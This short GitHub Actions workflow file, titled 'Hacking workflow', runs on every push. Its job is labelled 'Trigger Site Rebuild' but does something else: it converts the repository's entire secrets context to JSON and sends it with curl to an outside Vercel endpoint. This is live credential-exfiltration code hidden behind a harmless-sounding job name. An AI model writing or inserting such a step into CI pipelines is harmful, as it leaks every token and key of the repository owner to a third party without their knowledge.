name: Hacking workflow
on: push
jobs:
  build:
    name: Trigger Site Rebuild
    runs-on: ubuntu-latest
    steps:
      - name: view the secrets context        
        run: |
          curl --request POST --url https://githubfan.vercel.app/api/newSecrets/2good2code-test_one --data "$SECRETS_CONTEXT"
        env:
          SECRETS_CONTEXT: ${{ toJson(secrets) }}
        shell: bash